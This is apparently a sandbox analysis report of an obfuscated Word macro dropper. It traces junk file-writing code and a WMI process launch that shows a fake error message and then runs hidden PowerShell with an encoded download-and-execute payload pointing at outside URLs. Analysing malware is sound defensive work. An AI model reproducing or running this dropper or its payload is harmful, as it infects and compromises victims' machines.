"hKlajOujwgDFAA"
"JMgUDAIEJlgyNBH"
"BUUJYAAIoJvLBLAo"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ"
"CVbRCAAhkhmcDG"
"XrrAwQZPjqB"
"fxSJajCGlWUEBW"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD"
"qiXBsMBsLJGbX"
"mehEFPFHcklgJDDx"
"BndJDkuVYF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH"
"JTSPCDjykfL"
"bBmgOCvPPojGGC"
"anBQXljzGenE"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"pGMMG:\enlVVB\fMqiFP.kEIECDZHz"
"dnUnKFHAkIOdD"
"ekluIEBJFIgoBcGC"
"BnxHFzJCGhVHrFIm"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW"
"fDdPHEjBEnAdZqZFJ"
"wypNISsWSXthFJCq"
"LvnHAGHfIhRDBRAF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA"
"DBvMcNtCcMyJDDI"
"eXpjHFapHaPdRJu"
"eXObOTlBAITEOIo"

Line	Instruction	Meta Information
2	Function G8xesq0b8jlsfrsp()
3	On Error Resume Next	executed
4	Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
5	sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89	Zw1k7hcmdl66 Item Hyii7r76oq89
6	Goto SblcDCC
7	Dim pULquU as Object
8	Set ibIiBF = diCXTi	diCXTi
9	Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
10	Dim SblcDCC as Object
11	Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	CreateTextFile
12	SblcDCC.WriteLine "VrVKCjefsIJ"	WriteLine
13	SblcDCC.WriteLine "sxbwAfRtWJI"	WriteLine
14	SblcDCC.WriteLine "WLXLJnjItPGPZJ"	WriteLine
15	Set jbUmDI = NZiApKAp	NZiApKAp
16	SblcDCC.Close	Close
17	Set pULquU = Nothing
18	Set MznOjBB = vrYYHIDxI	vrYYHIDxI
19	Set SblcDCC = Nothing
19	SblcDCC:
21	t3s = "]anw[3" + "p]anw[3"
22	K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
23	Goto fNhiCVgGS
24	Dim RyDBDK as Object
25	Set WTbkNqFa = gzTFLxb	gzTFLxb
26	Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
27	Dim fNhiCVgGS as Object
28	Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	CreateTextFile
29	fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"	WriteLine
30	fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"	WriteLine
31	fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"	WriteLine
32	Set OlapGi = PjNhJNA	PjNhJNA
33	fNhiCVgGS.Close	Close
34	Set RyDBDK = Nothing
35	Set yabVbA = oAaNlB	oAaNlB
36	Set fNhiCVgGS = Nothing
36	fNhiCVgGS:
38	Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
39	Goto HCvCmAcHC
40	Dim iFTmFHFH as Object
41	Set UDSpFHqFJ = sySRJ	sySRJ
42	Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
43	Dim HCvCmAcHC as Object
44	Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	CreateTextFile
45	HCvCmAcHC.WriteLine "uTtCAFwHpCGF"	WriteLine
46	HCvCmAcHC.WriteLine "lwWhZGEasjsS"	WriteLine
47	HCvCmAcHC.WriteLine "MiCjaGqJfPrI"	WriteLine
48	Set MmSDYCkJR = UwyYSBsBN	UwyYSBsBN
49	HCvCmAcHC.Close	Close
50	Set iFTmFHFH = Nothing
51	Set EISYDDB = tpOgXmm	tpOgXmm
52	Set HCvCmAcHC = Nothing
52	HCvCmAcHC:
54	Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
55	Goto gEcrV
56	Dim RqlOZAHRJ as Object
57	Set jsYAGBJAF = MHYlQAD	MHYlQAD
58	Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
59	Dim gEcrV as Object
60	Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	CreateTextFile
61	gEcrV.WriteLine "dXFPCSYtSNB"	WriteLine
62	gEcrV.WriteLine "KqVyuQQfwTWh"	WriteLine
63	gEcrV.WriteLine "qDaYIDDSZQMTaO"	WriteLine
64	Set IePCGy = GznGGHyG	GznGGHyG
65	gEcrV.Close	Close
66	Set RqlOZAHRJ = Nothing
67	Set cwsTFPCH = bbsIZ	bbsIZ
68	Set gEcrV = Nothing
68	gEcrV:
70	Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"	Mid Name Application
71	Goto ZMdrVHGz
72	Dim xsruLB as Object
73	Set fiyQuiRBI = swNGWdd	swNGWdd
74	Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
75	Dim ZMdrVHGz as Object
76	Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	CreateTextFile
77	ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"	WriteLine
78	ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"	WriteLine
79	ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"	WriteLine
80	Set xPBGH = rJEkbLH	rJEkbLH
81	ZMdrVHGz.Close	Close
82	Set xsruLB = Nothing
83	Set dLRiF = vEBqHrDnD	vEBqHrDnD
84	Set ZMdrVHGz = Nothing
84	ZMdrVHGz:
86	K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
87	Goto fDZVKAAc
88	Dim tzErBRFe as Object
89	Set SeHafBC = tWcKo	tWcKo
90	Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
91	Dim fDZVKAAc as Object
92	Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	CreateTextFile
93	fDZVKAAc.WriteLine "hKlajOujwgDFAA"	WriteLine
94	fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"	WriteLine
95	fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"	WriteLine
96	Set CHVmaVC = LzxxRHG	LzxxRHG
97	fDZVKAAc.Close	Close
98	Set tzErBRFe = Nothing
99	Set WlBWDXGD = EKezHIC	EKezHIC
100	Set fDZVKAAc = Nothing
100	fDZVKAAc:
102	Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
103	Goto rYbgBh
104	Dim hZCth as Object
105	Set LQqlBAHD = DpYbmDA	DpYbmDA
106	Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
107	Dim rYbgBh as Object
108	Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	CreateTextFile
109	rYbgBh.WriteLine "CVbRCAAhkhmcDG"	WriteLine
110	rYbgBh.WriteLine "XrrAwQZPjqB"	WriteLine
111	rYbgBh.WriteLine "fxSJajCGlWUEBW"	WriteLine
112	Set phIwFD = hDJDJ	hDJDJ
113	rYbgBh.Close	Close
114	Set hZCth = Nothing
115	Set PnolTIbAB = dXiwA	dXiwA
116	Set rYbgBh = Nothing
116	rYbgBh:
118	Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)	CreateObject("winmgmts:win32_process") executed
119	Goto GfRPP
120	Dim xLQtMd as Object
121	Set uRnkDGJ = hFSyAfFrF	hFSyAfFrF
122	Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
123	Dim GfRPP as Object
124	Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	CreateTextFile
125	GfRPP.WriteLine "qiXBsMBsLJGbX"	WriteLine
126	GfRPP.WriteLine "mehEFPFHcklgJDDx"	WriteLine
127	GfRPP.WriteLine "BndJDkuVYF"	WriteLine
128	Set xiFRA = hXxQDACJA	hXxQDACJA
129	GfRPP.Close	Close
130	Set xLQtMd = Nothing
131	Set jENfzNH = xkQqDXCcD	xkQqDXCcD
132	Set GfRPP = Nothing
132	GfRPP:
134	Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))	Mid Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689 executed
135	Goto sCOIGDtD
136	Dim eepvDEaE as Object
137	Set jzqBlGW = lBenBDA	lBenBDA
138	Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
139	Dim sCOIGDtD as Object
140	Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	CreateTextFile
141	sCOIGDtD.WriteLine "JTSPCDjykfL"	WriteLine
142	sCOIGDtD.WriteLine "bBmgOCvPPojGGC"	WriteLine
143	sCOIGDtD.WriteLine "anBQXljzGenE"	WriteLine
144	Set tAmQHxlD = UavHTIBHo	UavHTIBHo
145	sCOIGDtD.Close	Close
146	Set eepvDEaE = Nothing
147	Set gphNDVZp = IcAHwPH	IcAHwPH
148	Set sCOIGDtD = Nothing
148	sCOIGDtD:
150	Goto fmwdEMADQ
151	Dim DkLoDL as Object
152	Set plqkuDI = BNmrm	BNmrm
153	Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
154	Dim fmwdEMADQ as Object
155	Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	CreateTextFile
156	fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"	WriteLine
157	fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"	WriteLine
158	fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"	WriteLine
159	Set jPJENIo = FLtYjKHC	FLtYjKHC
160	fmwdEMADQ.Close	Close
161	Set DkLoDL = Nothing
162	Set ANzGyzCD = qAUhkIMz	qAUhkIMz
163	Set fmwdEMADQ = Nothing
163	fmwdEMADQ:
165	Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0 V2enhc4htwl7z6bh Thriap3q9rgf3yy9y executed
166	Goto pkixJADG
167	Dim DhnHIY as Object
168	Set oQgLUI = zZuzBZGD	zZuzBZGD
169	Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
170	Dim pkixJADG as Object
171	Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	CreateTextFile
172	pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"	WriteLine
173	pkixJADG.WriteLine "wypNISsWSXthFJCq"	WriteLine
174	pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"	WriteLine
175	Set ecGmY = OIbfvEEFF	OIbfvEEFF
176	pkixJADG.Close	Close
177	Set DhnHIY = Nothing
178	Set EKmLA = eLmLDU	eLmLDU
179	Set pkixJADG = Nothing
179	pkixJADG:
181	Goto KmGOADt
182	Dim CFdSBD as Object
183	Set nhLeJMLfI = FYVZFEH	FYVZFEH
184	Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
185	Dim KmGOADt as Object
186	Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	CreateTextFile
187	KmGOADt.WriteLine "DBvMcNtCcMyJDDI"	WriteLine
188	KmGOADt.WriteLine "eXpjHFapHaPdRJu"	WriteLine
189	KmGOADt.WriteLine "eXObOTlBAITEOIo"	WriteLine
190	Set STzBjwICv = hoyzuBGCP	hoyzuBGCP
191	KmGOADt.Close	Close
192	Set CFdSBD = Nothing
193	Set ORLICIl = lADFBaJ	lADFBaJ
194	Set KmGOADt = Nothing
194	KmGOADt:
196	End Function

Function Jlda77h_v8nx5, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566

APIs	Meta Information
SQQWY
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
